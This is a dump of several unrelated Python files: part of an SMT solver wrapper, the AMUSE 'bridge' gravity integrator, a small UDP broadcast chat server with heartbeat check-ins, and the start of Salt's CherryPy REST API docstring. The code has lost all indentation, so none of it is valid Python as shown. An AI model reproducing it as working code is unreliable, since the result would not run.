def get_list(self, expr_list):
if len(expr_list) == 0:
return []
self.write("(get-value (%s))" % " ".join(expr_list))
return [n[1] for n in self.parse(self.read())]
def get_path(self, mod, path):
assert mod in self.modinfo
path = path.split(".")
for i in range(len(path)-1):
first = ".".join(path[0:i+1])
second = ".".join(path[i+1:])
if first in self.modinfo[mod].cells:
nextmod = self.modinfo[mod].cells[first]
return [first] + self.get_path(nextmod, second)
return [".".join(path)]
def net_expr(self, mod, base, path):
if len(path) == 0:
return base
if len(path) == 1:
assert mod in self.modinfo
if path[0] == "":
return base
if path[0] in self.modinfo[mod].cells:
return "(|%s_h %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].wsize:
return "(|%s_n %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].memories:
return "(|%s_m %s| %s)" % (mod, path[0], base)
assert 0
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.net_expr(nextmod, nextbase, path[1:])
def net_width(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
assert net_path[-1] in self.modinfo[mod].wsize
return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
if net_path[-1] not in self.modinfo[mod].clocks:
return None
return self.modinfo[mod].clocks[net_path[-1]]
def net_exists(self, mod, net_path):
for i in range(len(net_path)-1):
if mod not in self.modinfo: return False
if net_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[net_path[i]]
if mod not in self.modinfo: return False
if net_path[-1] not in self.modinfo[mod].wsize: return False
return True
def mem_exists(self, mod, mem_path):
for i in range(len(mem_path)-1):
if mod not in self.modinfo: return False
if mem_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[mem_path[i]]
if mod not in self.modinfo: return False
if mem_path[-1] not in self.modinfo[mod].memories: return False
return True
def mem_expr(self, mod, base, path, port=None, infomode=False):
if len(path) == 1:
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].memories
if infomode:
return self.modinfo[mod].memories[path[0]]
return "(|%s_m%s %s| %s)" % (mod, "" if port is None else ":%s" % port, path[0], base)
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.mem_expr(nextmod, nextbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
return self.mem_expr(mod, "", path, infomode=True)
def get_net(self, mod_name, net_path, state_name):
return self.get(self.net_expr(mod_name, state_name, net_path))
def get_net_list(self, mod_name, net_path_list, state_name):
return self.get_list([self.net_expr(mod_name, state_name, n) for n in net_path_list])
def get_net_hex(self, mod_name, net_path, state_name):
return self.bv2hex(self.get_net(mod_name, net_path, state_name))
def get_net_hex_list(self, mod_name, net_path_list, state_name):
return [self.bv2hex(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def get_net_bin(self, mod_name, net_path, state_name):
return self.bv2bin(self.get_net(mod_name, net_path, state_name))
def get_net_bin_list(self, mod_name, net_path_list, state_name):
return [self.bv2bin(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def wait(self):
if self.p is not None:
self.p.wait()
self.p_close()
class SmtOpts:
def __init__(self):
self.shortopts = "s:S:v"
self.longopts = ["unroll", "noincr", "noprogress", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.unroll = False
self.noincr = False
self.timeinfo = os.name != "nt"
self.logic = None
self.info_stmts = list()
self.nocomments = False
def handle(self, o, a):
if o == "-s":
self.solver = a
elif o == "-S":
self.solver_opts.append(a)
elif o == "-v":
self.debug_print = True
elif o == "--unroll":
self.unroll = True
elif o == "--noincr":
self.noincr = True
elif o == "--noprogress":
self.timeinfo = False
elif o == "--dump-smt2":
self.debug_file = open(a, "w")
elif o == "--logic":
self.logic = a
elif o == "--dummy":
self.dummy_file = a
elif o == "--info":
self.info_stmts.append(a)
elif o == "--nocomments":
self.nocomments = True
else:
return False
return True
def helpmsg(self):
return """
-s <solver>
set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
default: yices
-S <opt>
pass <opt> as command line argument to the solver
--logic <smt2_logic>
use the specified SMT2 logic (e.g. QF_AUFBV)
--dummy <filename>
if solver is "dummy", read solver output from that file
otherwise: write solver output to that file
-v
enable debug output
--unroll
unroll uninterpreted functions
--noincr
don't use incremental solving, instead restart solver for
each (check-sat). This also avoids (push) and (pop).
--noprogress
disable timer display during solving
(this option is set implicitly on Windows)
--dump-smt2 <filename>
write smt2 statements to file
--info <smt2-info-stmt>
include the specified smt2 info statement in the smt2 output
--nocomments
strip all comments from the generated smt2 code
"""
class MkVcd:
def __init__(self, f):
self.f = f
self.t = -1
self.nets = dict()
self.clocks = dict()
def add_net(self, path, width):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, width)
def add_clock(self, path, edge):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, 1)
self.clocks[path] = (key, edge)
def set_net(self, path, bits):
path = tuple(path)
assert self.t >= 0
assert path in self.nets
if path not in self.clocks:
print("b%s %s" % (bits, self.nets[path][0]), file=self.f)
def escape_name(self, name):
name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
if re.match("[\[\]]", name) and name[0] != "\\":
name = "\\" + name
return name
def set_time(self, t):
assert t >= self.t
if t != self.t:
if self.t == -1:
print("$var integer 32 t smt_step $end", file=self.f)
print("$var event 1 ! smt_clock $end", file=self.f)
scope = []
for path in sorted(self.nets):
key, width = self.nets[path]
uipath = list(path)
if "." in uipath[-1]:
uipath = uipath[0:-1] + uipath[-1].split(".")
for i in range(len(uipath)):
uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
while uipath[:len(scope)] != scope:
print("$upscope $end", file=self.f)
scope = scope[:-1]
while uipath[:-1] != scope:
print("$scope module %s $end" % uipath[len(scope)], file=self.f)
scope.append(uipath[len(scope)])
if path in self.clocks and self.clocks[path][1] == "event":
print("$var event 1 %s %s $end" % (key, uipath[-1]), file=self.f)
else:
print("$var wire %d %s %s $end" % (width, key, uipath[-1]), file=self.f)
for i in range(len(scope)):
print("$upscope $end", file=self.f)
print("$enddefinitions $end", file=self.f)
self.t = t
assert self.t >= 0
if self.t > 0:
print("#%d" % (10 * self.t - 5), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "posedge":
print("b0 %s" % self.nets[path][0], file=self.f)
elif self.clocks[path][1] == "negedge":
print("b1 %s" % self.nets[path][0], file=self.f)
print("#%d" % (10 * self.t), file=self.f)
print("1!", file=self.f)
print("b%s t" % format(self.t, "032b"), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "negedge":
print("b0 %s" % self.nets[path][0], file=self.f)
else:
print("b1 %s" % self.nets[path][0], file=self.f)
|
bridge.py
|
"""
bridge-like integrator for amuse
the bridge class provides a bridge like coupling between different
gravitational integrators. In this way a system composed of multiple
components can be evolved taking into account the self-gravity of the whole
system self-consistently, while choosing the most appropriate integrator
for the self-gravity of the component systems. This is mainly useful for
systems consisting of two or more components that are either well separated
spatially or have different scales (otherwise using a single integrator is
more efficient)
The main idea is that systems experience each other's gravity through
periodic velocity kicks with ordinary evolution in between - the evolution
is thus described by an alternation of drift (D) and kick (K) operators,
here chosen as:
K(1/2 dt) D(dt) K(1/2 dt)
K(dt) denotes a kick of the velocities over a timestep dt, while D(dt)
denotes a drift, meaning secular evolution using self gravity of the
system, over dt.
implementation notes:
In order to use bridge the component systems should be initialized as usual,
then a bridge system is initialized, after which one or more systems are
added:
from amuse.ext.bridge import bridge
bridgesys=bridge(verbose=False)
bridgesys.add_system(galaxy, (cluster,), False)
bridgesys.add_system(cluster, (galaxy,), True )
bridge builds on the full gravity interface, so unit handling etc is
guaranteed. Bridge itself is a (somewhat incomplete) gravity interface,
so the usual evolve, get_potential methods work (and bridge can be a
component in a bridge system). Note that a single coordinate system should
be used at the moment for all the component systems (different units are
allowed though). The call to add systems, for example:
bridgesys.add_system(galaxy, (cluster,), False)
has three arguments: the system, a set with *interaction* partners and
a flag to specify whether synchronization is needed. The
interaction partners indicate which systems will kick the system. In the
most simple case these would be the set of other systems that are added,
but usually this is not what you want to get good performace. In some
cases you want to ignore one direction of interaction (eg. in a combined
simulation of a galaxy and a comet orbits around a star you may want the
ignore the gravity of the comet), in other cases you want to use a
different force calculator (eg integrating a cluster in a galaxy where
the galaxy is evolved with a tree code and the cluster with a direct sum
code, one also would want to use a tree code to calculate the cluster
gravity for the galaxy. In such a case one can derive a skeleton gravity
interface from the cluster system. A module is provided with some
examples of such *derived* systems, derived_grav_systems.py
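As a purely illustrative sketch (the class and argument names below are made
up; see derived_grav_systems.py and the CalculateFieldForCodes helpers in this
module for working examples), such a skeleton could look like:
    class cluster_field_via_tree(object):
        def __init__(self, cluster_code, make_tree_code):
            # cluster_code: the direct-sum code holding the cluster particles
            # make_tree_code: factory returning a fresh tree-code instance
            self.cluster = cluster_code
            self.make_tree_code = make_tree_code
        def get_gravity_at_point(self, radius, x, y, z):
            tree = self.make_tree_code()
            try:
                tree.particles.add_particles(self.cluster.particles)
                return tree.get_gravity_at_point(radius, x, y, z)
            finally:
                tree.stop()
        def get_potential_at_point(self, radius, x, y, z):
            tree = self.make_tree_code()
            try:
                tree.particles.add_particles(self.cluster.particles)
                return tree.get_potential_at_point(radius, x, y, z)
            finally:
                tree.stop()
Such an object can then be passed as an interaction partner in add_system.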
Hints for good use:
The bridgesys is flexible but care should be taken in order to obtain
valid results. For one thing, there is no restriction or check on the
validity of the assumption of well separated dynamics: for example any
system could be split up and put together in bridge, but if the timestep
is chosen to be larger than the timestep criterion of the code, the
integration will show errors.
For good performance one should use derived systems to reduce the
complexity where possible.
There is an issue with the synchronization: some codes do not end on the
exact time of an evolve, or need an explicit sync call. In these cases it
is up to the user to determine whether bridge can be used (an explicit
sync call may induce extra errors that degrade the order of the
integrator).
"""
# issues:
# - for now, units in si
# - a common coordinate system is used for all systems
# - sync of systems should be checked
# - timestepping: adaptive dt?
import threading
from amuse.units import quantities
from amuse.units import units, constants, generic_unit_system, nbody_system
from amuse import datamodel
from amuse.support.exceptions import AmuseException
class AbstractCalculateFieldForCodes(object):
"""
Calculate gravity and potential fields using the particles
of other codes with the code provided.
"""
def __init__(self, input_codes, verbose=False, required_attributes=None):
"""
'verbose' indicates whether to output some run info
'required_attributes' specifies which particle attributes need to be
transferred from the input_codes to the code that will calculate the
field. For example, some codes don't need the velocity. Other codes
may (wrongly) interpret the radius of the input code as gravitational
softening. In the latter case
required_attributes=['mass', 'x','y','z', 'vx','vy','vz']
should prevent the radius of the input codes from being used.
"""
self.codes_to_calculate_field_for = input_codes
self.verbose=verbose
if required_attributes is None:
self.required_attributes = lambda p, attribute_name: True
else:
self.required_attributes = lambda p, attribute_name: attribute_name in required_attributes
def evolve_model(self,tend,timestep=None):
"""
"""
def get_potential_at_point(self,radius,x,y,z):
code = self._setup_code()
try:
for input_code in self.codes_to_calculate_field_for:
particles = input_code.particles.copy(filter_attributes = self.required_attributes)
code.particles.add_particles(particles)
code.commit_particles()
return code.get_potential_at_point(radius,x,y,z)
finally:
self._cleanup_code(code)
def get_gravity_at_point(self,radius,x,y,z):
code = self._setup_code()
try:
for input_code in self.codes_to_calculate_field_for:
particles = input_code.particles.copy(filter_attributes = self.required_attributes)
code.particles.add_particles(particles)
code.commit_particles()
return code.get_gravity_at_point(radius,x,y,z)
finally:
self._cleanup_code(code)
def _setup_code(self):
pass
def _cleanup_code(self, code):
pass
class CalculateFieldForCodes(AbstractCalculateFieldForCodes):
"""
Calculate gravity and potential fields using the particles
of other codes with the code provided.
The code is created for every calculation.
"""
def __init__(self, code_factory_function, input_codes, *args, **kwargs):
AbstractCalculateFieldForCodes.__init__(self, input_codes, *args, **kwargs)
self.code_factory_function = code_factory_function
def _setup_code(self):
return self.code_factory_function()
def _cleanup_code(self, code):
code.stop()
class CalculateFieldForCodesUsingReinitialize(AbstractCalculateFieldForCodes):
"""
Calculate gravity and potential fields using the particles
of other codes with the code provided.
The same code instance is reused and reset after every calculation.
"""
def __init__(self, code, input_codes, *args, **kwargs):
AbstractCalculateFieldForCodes.__init__(self, input_codes, *args, **kwargs)
self.code = code
def _setup_code(self):
return self.code
def _cleanup_code(self, code):
code.reset()
class CalculateFieldForCodesUsingRemove(AbstractCalculateFieldForCodes):
"""
Calculate gravity and potential fields using the particles
of other codes with the code provided.
The same code instance is reused; its particles are removed after every calculation.
"""
def __init__(self, code, input_codes, *args, **kwargs):
AbstractCalculateFieldForCodes.__init__(self, input_codes, *args, **kwargs)
self.code = code
def _setup_code(self):
return self.code
def _cleanup_code(self, code):
code.particles.remove_particles(code.particles)
class CalculateFieldForParticles(object):
"""
Calculates a field for a set of particles; the set
of particles can be from another code.
"""
def __init__(self, particles = None, gravity_constant = None,
softening_mode="shared", G = None):
if particles is None:
self.particles=datamodel.Particles()
else:
self.particles = particles
if gravity_constant is None:
gravity_constant = G
elif G is not None:
raise Exception("both the parameter 'gravity_constant'({0}) and the parameter 'G'({1}) are given, please specify only one!".format(gravity_constant, G))
if gravity_constant is None:
if len(particles) and hasattr(particles, 'mass'):
try:
particles[0].mass.value_in(units.kg)
self.gravity_constant = constants.G
except:
raise AmuseException("For generic units the gravity_constant must be specified")
else:
raise AmuseException("Particle data not yet available, so the gravity_constant must be specified")
else:
self.gravity_constant = gravity_constant
if softening_mode == "individual" or softening_mode == "radius":
self._softening_lengths_squared = self._softening_lengths_squared_individual
elif softening_mode == "h_smooth":
self._softening_lengths_squared = self._softening_lengths_squared_h_smooth
else:
self._softening_lengths_squared = self._softening_lengths_squared_shared
self.smoothing_length_squared = quantities.zero
def _softening_lengths_squared_individual(self):
return self.particles.radius**2
def _softening_lengths_squared_h_smooth(self):
return self.particles.h_smooth**2
def _softening_lengths_squared_shared(self):
return self.smoothing_length_squared#.as_vector_with_length(len(self.particles))
def cleanup_code(self):
self.particles = datamodel.Particles()
def evolve_model(self,tend,timestep=None):
"""
"""
def get_potential_at_point(self,radius,x,y,z):
positions = self.particles.position
result = quantities.AdaptingVectorQuantity()
for i in range(len(x)):
dx = x[i] - positions.x
dy = y[i] - positions.y
dz = z[i] - positions.z
dr_squared = (dx * dx) + (dy * dy) + (dz * dz)
dr = (dr_squared + self._softening_lengths_squared()).sqrt()
energy_of_this_particle = (self.particles.mass / dr).sum()
result.append(-self.gravity_constant * energy_of_this_particle)
return result
def get_gravity_at_point(self,radius,x,y,z):
positions = self.particles.position
m1 = self.particles.mass
result_ax = quantities.AdaptingVectorQuantity()
result_ay = quantities.AdaptingVectorQuantity()
result_az = quantities.AdaptingVectorQuantity()
for i in range(len(x)):
dx = x[i] - positions.x
dy = y[i] - positions.y
dz = z[i] - positions.z
dr_squared = ((dx * dx) + (dy * dy) + (dz * dz) +
self._softening_lengths_squared() + radius[i]**2)
ax = -self.gravity_constant * (m1*dx/dr_squared**1.5).sum()
ay = -self.gravity_constant * (m1*dy/dr_squared**1.5).sum()
az = -self.gravity_constant * (m1*dz/dr_squared**1.5).sum()
result_ax.append(ax)
result_ay.append(ay)
result_az.append(az)
return result_ax, result_ay, result_az
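# Illustrative sketch (not part of the original module): using
# CalculateFieldForParticles as a static background field that kicks a live
# N-body code inside a Bridge. 'live_code' and 'background_particles' are
# hypothetical stand-ins for an initialized gravity code and a particle set.
def _example_static_background_bridge(live_code, background_particles, t_end, dt):
    background = CalculateFieldForParticles(particles=background_particles,
                                            gravity_constant=constants.G)
    bridgesys = Bridge(timestep=dt)
    # the live code is kicked by the background; the background itself is not evolved
    bridgesys.add_system(live_code, (background,))
    bridgesys.evolve_model(t_end)
    return bridgesys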
class GravityCodeInField(object):
def __init__(self, code, field_codes, do_sync=True, verbose=False, radius_is_eps=False, h_smooth_is_eps=False, zero_smoothing=False, use_velocity=False):
"""
verbose indicates whether to output some run info
"""
self.code = code
self.field_codes = field_codes
if hasattr(self.code, 'model_time'):
self.time = self.code.model_time
else:
self.time = quantities.zero
self.do_sync=do_sync
self.verbose=verbose
self.timestep=None
self.radius_is_eps = radius_is_eps
self.h_smooth_is_eps = h_smooth_is_eps
required_attributes = ['mass', 'x', 'y', 'z', 'vx', 'vy', 'vz']
if self.radius_is_eps:
required_attributes.append('radius')
elif self.h_smooth_is_eps:
required_attributes.append('h_smooth')
self.required_attributes = lambda p, x : x in required_attributes
if not hasattr(self.code,"parameters"):
self.zero_smoothing=True
elif not hasattr(self.code.parameters,"epsilon_squared"):
self.zero_smoothing=True
else:
self.zero_smoothing=zero_smoothing
self.use_velocity=use_velocity
def evolve_model(self,tend,timestep=None):
"""
evolve the combined system to tend; an explicit timestep overrides the stored timestep
"""
if timestep is None:
timestep = self.timestep
first=True
while self.time < (tend-timestep/2.):
if first:
self.kick(timestep/2.)
first=False
else:
self.kick(timestep)
self.drift(self.time+timestep)
self.time+=timestep
if not first:
self.kick(timestep/2.)
def synchronize_model(self):
"""
explicitly synchronize all components
"""
if hasattr(self.code,"synchronize_model"):
if(self.verbose):
print(self.code.__class__.__name__,"is synchronizing", end=' ')
self.code.synchronize_model()
if(self.verbose):
print(".. done")
def get_potential_at_point(self,radius,x,y,z):
return self.code.get_potential_at_point(radius,x,y,z)
def get_gravity_at_point(self,radius,x,y,z):
return self.code.get_gravity_at_point(radius,x,y,z)
@property
def model_time(self):
return self.time
@property
def potential_energy(self):
if not hasattr(self.code, 'particles'):
return quantities.zero
result = self.code.potential_energy
particles = self.code.particles.copy(filter_attributes = self.required_attributes)
for y in self.field_codes:
energy = self.get_potential_energy_in_field_code(particles, y)
result += energy
return result
@property
def kinetic_energy(self):
return self.code.kinetic_energy
@property
def thermal_energy(self):
if hasattr(self.code,'thermal_energy'):
return self.code.thermal_energy
else:
return quantities.zero
@property
def particles(self):
return self.code.particles
@property
def gas_particles(self):
if hasattr(self.code, "gas_particles"):
return self.code.gas_particles
else:
raise AttributeError
@property
def dm_particles(self):
if hasattr(self.code, "dm_particles"):
return self.code.dm_particles
else:
raise AttributeError
def drift(self, tend):
if not hasattr(self.code,"evolve_model"):
return
if (self.verbose):
print(self.code.__class__.__name__, "is evolving to", tend)
self.code.evolve_model(tend)
if(self.verbose):
print(".. done")
def cannot_kick(self):
"""
check whether this code's particles can actually receive kicks;
please do not try to optimize this: I know it is called on every kick, but
calculating it only once at the start causes an annoying bug in certain uses of the code.
"""
return len(self.code.particles)==0 or not (hasattr(self, 'particles') and 'vx' in self.particles.get_attribute_names_defined_in_store())
def kick(self, dt):
if self.cannot_kick():
return quantities.zero
particles = self.code.particles.copy(filter_attributes = self.required_attributes)
kinetic_energy_before = particles.kinetic_energy()
for field_code in self.field_codes:
if(self.verbose):
print(self.code.__class__.__name__,"receives kick from",field_code.__class__.__name__, end=' ')
self.kick_with_field_code(
particles,
field_code,
dt
)
if(self.verbose):
print(".. done")
channel=particles.new_channel_to(self.code.particles)
channel.copy_attributes(["vx","vy","vz"])
kinetic_energy_after = particles.kinetic_energy()
return kinetic_energy_after - kinetic_energy_before
def _softening_lengths(self, particles):
if self.radius_is_eps:
return particles.radius
elif self.h_smooth_is_eps:
return particles.h_smooth
elif self.zero_smoothing:
return 0.*particles.x
else:
return (self.code.parameters.epsilon_squared**0.5).as_vector_with_length(len(particles))
def get_potential_energy_in_field_code(self, particles, field_code):
pot=field_code.get_potential_at_point(
self._softening_lengths(particles),
particles.x,
particles.y,
particles.z
)
return (pot*particles.mass).sum() / 2
def kick_with_field_code(self, particles, field_code, dt):
if self.use_velocity:
ax,ay,az=field_code.get_gravity_at_point(
self._softening_lengths(particles),
particles.x,
particles.y,
particles.z,
particles.vx,
particles.vy,
particles.vz
)
else:
ax,ay,az=field_code.get_gravity_at_point(
self._softening_lengths(particles),
particles.x,
particles.y,
particles.z
)
self.update_velocities(particles, dt, ax, ay, az)
def update_velocities(self,particles, dt, ax, ay, az):
particles.vx += dt * ax
particles.vy += dt * ay
particles.vz += dt * az
def stop(self):
self.code.stop()
class Bridge(object):
def __init__(self, timestep = None, verbose=False, use_threading=True,method=None):
"""
verbose indicates whether to output some run info
"""
self.codes=[]
self.time=quantities.zero
self.verbose=verbose
self.timestep=timestep
self.kick_energy = quantities.zero
self.use_threading = use_threading
self.time_offsets = dict()
self.method=method
self.channels = datamodel.Channels()
def add_system(self, interface, partners=set(), do_sync=True,
radius_is_eps=False, h_smooth_is_eps=False, zero_smoothing=False):
"""
add a system to bridge integrator
"""
if hasattr(interface, "particles"):
code = GravityCodeInField(interface, partners, do_sync, self.verbose,
radius_is_eps, h_smooth_is_eps, zero_smoothing)
self.add_code(code)
else:
if len(partners):
raise Exception("You added a code without particles, but with partners, this is not supported!")
self.add_code(interface)
def add_code(self, code):
self.codes.append(code)
if hasattr(code,"model_time"):
self.time_offsets[code]=(self.time-code.model_time)
else:
self.time_offsets[code]=quantities.zero
def evolve_model(self, tend, timestep=None):
"""
evolve the combined system to tend; an explicit timestep overrides the stored timestep
"""
if timestep is None:
if self.timestep is None:
timestep=tend-self.time
else:
timestep = self.timestep
if self.method is None:
return self.evolve_joined_leapfrog(tend,timestep)
else:
return self.evolve_simple_steps(tend,timestep)
def evolve_simple_steps(self,tend,timestep):
while self.time < (tend-timestep/2):
self._drift_time=self.time
self.method(self.kick_codes,self.drift_codes_dt, timestep)
self.channels.copy()
self.time=self.time+timestep
def evolve_joined_leapfrog(self,tend,timestep):
first=True
while self.time < (tend-timestep/2.):
if first:
self.kick_codes(timestep/2.)
first=False
else:
self.kick_codes(timestep)
self.drift_codes(self.time+timestep)
self.channels.copy()
self.time += timestep
if not first:
self.kick_codes(timestep/2.)
def synchronize_model(self):
"""
explicitly synchronize all components
"""
for x in self.codes:
if hasattr(x,"synchronize_model"):
if(self.verbose): print(x.__class__.__name__,"is synchronizing", end=' ')
x.synchronize_model()
if(self.verbose): print(".. done")
def stop(self):
for one_code in self.codes:
if hasattr(one_code, "stop"):
one_code.stop()
def get_potential_at_point(self,radius,x,y,z):
pot=quantities.zero
for code in self.codes:
_pot=code.get_potential_at_point(radius,x,y,z)
pot=pot+_pot
return pot
def get_gravity_at_point(self,radius,x,y,z):
ax=quantities.zero
ay=quantities.zero
az=quantities.zero
for code in self.codes:
_ax,_ay,_az=code.get_gravity_at_point(radius,x,y,z)
ax=ax+_ax
ay=ay+_ay
az=az+_az
return ax,ay,az
@property
def model_time(self):
return self.time
@property
def potential_energy(self):
result=quantities.zero
for x in self.codes:
result+=x.potential_energy
return result
@property
def kinetic_energy(self):
result=quantities.zero
for x in self.codes:
result+=x.kinetic_energy
return result #- self.kick_energy
@property
def thermal_energy(self):
result=quantities.zero
for x in self.codes:
if hasattr(x,'thermal_energy'):
result+=x.thermal_energy
return result
@property
def particles(self):
array=[]
for x in self.codes:
if hasattr(x,"particles"):
array.append(x.particles)
if len(array) == 0:
raise AttributeError
elif len(array) == 1:
return array[0]
return datamodel.ParticlesSuperset(array)
@property
def gas_particles(self):
array=[]
for x in self.codes:
if hasattr(x,"gas_particles"):
array.append(x.gas_particles)
if len(array) == 0:
raise AttributeError
elif len(array) == 1:
return array[0]
return datamodel.ParticlesSuperset(array)
@property
def dm_particles(self):
array=[]
for x in self.codes:
if hasattr(x,"dm_particles"):
array.append(x.dm_particles)
elif hasattr(x,"particles"):
array.append(x.particles)
if len(array) == 0:
raise AttributeError
elif len(array) == 1:
return array[0]
return datamodel.ParticlesSuperset(array)
# 'private' functions
def drift_codes_dt(self,dt):
self._drift_time+=dt
self.drift_codes(self._drift_time)
def drift_codes(self,tend):
threads=[]
for x in self.codes:
offset=self.time_offsets[x]
if hasattr(x,"drift"):
threads.append(threading.Thread(target=x.drift, args=(tend-offset,)) )
elif hasattr(x,"evolve_model"):
threads.append(threading.Thread(target=x.evolve_model, args=(tend-offset,)) )
if self.use_threading:
for x in threads:
x.start()
for x in threads:
x.join()
else:
for x in threads:
x.run()
def kick_codes(self,dt):
de = quantities.zero
for x in self.codes:
if hasattr(x,"kick"):
de += x.kick(dt)
self.kick_energy += de
class VelocityDependentBridge(Bridge):
def __init__(self, timestep=None, verbose=False, use_threading=True, method=None):
"""
verbose indicates whether to output some run info
"""
self.codes=[]
self.use_velocity=[]
self.time=quantities.zero
self.verbose=verbose
self.timestep=timestep
self.kick_energy = quantities.zero
self.use_threading = use_threading
self.time_offsets = dict()
self.method=method
self.channels = datamodel.Channels()
def add_system(self, interface, partners=set(), do_sync=True,
radius_is_eps=False, h_smooth_is_eps=False, zero_smoothing=False,use_velocity=False):
"""
add a system to bridge integrator
"""
if hasattr(interface, "particles"):
code = GravityCodeInField(interface, partners, do_sync, self.verbose,
radius_is_eps, h_smooth_is_eps, zero_smoothing, use_velocity)
self.add_code(code)
else:
if len(partners):
raise Exception("You added a code without particles, but with partners, this is not supported!")
self.add_code(interface)
self.use_velocity.append(use_velocity)
def get_gravity_at_point(self,radius,x,y,z,**kwargs):
ax=quantities.zero
ay=quantities.zero
az=quantities.zero
for i,code in enumerate(self.codes):
if self.use_velocity[i]:
vx,vy,vz=kwargs.get('vx'),kwargs.get('vy'),kwargs.get('vz')
_ax,_ay,_az=code.get_gravity_at_point(radius,x,y,z,vx=vx,vy=vy,vz=vz)
else:
_ax,_ay,_az=code.get_gravity_at_point(radius,x,y,z)
ax=ax+_ax
ay=ay+_ay
az=az+_az
return ax,ay,az
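# Illustrative usage sketch (not part of the bridge API): given two already
# initialized gravity codes -- 'galaxy_code' and 'cluster_code' are
# hypothetical -- a mutually coupled bridged evolution could look like this.
def _example_two_component_bridge(galaxy_code, cluster_code, t_end, dt):
    bridgesys = Bridge(timestep=dt, verbose=False)
    # the galaxy is kicked by the cluster, without an explicit synchronization
    bridgesys.add_system(galaxy_code, (cluster_code,), False)
    # the cluster is kicked by the galaxy and synchronized after each evolve
    bridgesys.add_system(cluster_code, (galaxy_code,), True)
    bridgesys.evolve_model(t_end)
    return bridgesys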
|
UDP_Broadcast_server.py
|
import socket
import time
import json
import threading
Thread_Flag=1 # flag: start the timer (heartbeat) thread only once
qian_Flag=0 # every five check-in rounds, recount the number of members; answering any of the five counts
New_table=[] # new member list; clients that check in are put in here
def sever():
global Thread_Flag,qian_Flag,New_table
HOST = '<broadcast>'
#HOST = "192.168.31.255"
ADDR = (HOST, 8884)
s = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
# allow broadcasting on this socket
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.bind(("192.168.0.105", 8884))
# list holding all known clients
cli_list = []
while True:
if Thread_Flag:
Thread_Flag=0
t=threading.Thread(target=thread_func,args=(s,cli_list,ADDR))
t.start()
info = {}
# receive data
data, addr = s.recvfrom(1024)
# ignore data the server receives from itself
if addr[0] == "192.168.0.105":
continue
data=data.decode()
print(qian_Flag)
if qian_Flag>=5: # packets may be lost, so refresh the online member count every five check-in rounds
print("updating member list")
qian_Flag=0
cli_list=New_table
info["type"]="updata"
info["data"]=cli_list
New_table=[]
s.sendto(bytes(json.dumps(info), encoding="utf8"),ADDR) # push the updated list to every client
continue
if data=="1": # a heartbeat packet was received
if addr not in New_table: # check whether this is a new member
New_table.append(addr)
print("heartbeat received")
continue
if addr in cli_list: # existing client
print("existing client:", addr, data)
info['type'] = "data"
else:
# add the new client to cli_list
cli_list.append(addr)
print("new client:", addr, data)
info['type'] = "member"
info['addr'] = addr
info['data'] = data
# broadcast the data; json.dumps(info) converts the dict to a string
s.sendto(bytes(json.dumps(info), encoding="utf8"),ADDR)
time.sleep(1)
def thread_func(s,cli_list,ADDR): # heartbeat / check-in broadcaster
global qian_Flag
info="签到" # "check in" request broadcast to the clients
while True:
time.sleep(5) # sleep five seconds between check-in broadcasts
s.sendto(bytes(info, encoding="utf8"),ADDR) # send the check-in request
qian_Flag=qian_Flag+1 # increment the check-in counter; the member list is refreshed after five
#time.sleep(5)
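# Illustrative client sketch (hypothetical; the real clients live in a
# separate file). It listens for the server's broadcasts on the same port,
# answers the "签到" (check-in) request with a heartbeat "1", and prints
# everything else it receives.
def example_client(server_ip="192.168.0.105", port=8884):
    c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    c.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    c.bind(("", port))  # receive the server's broadcast packets
    while True:
        data, addr = c.recvfrom(1024)
        text = data.decode()
        if text == "签到":  # server asks clients to check in
            c.sendto(b"1", (server_ip, port))  # reply with a heartbeat
        else:
            print("received:", text)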
if __name__ == '__main__':
sever()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms, and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
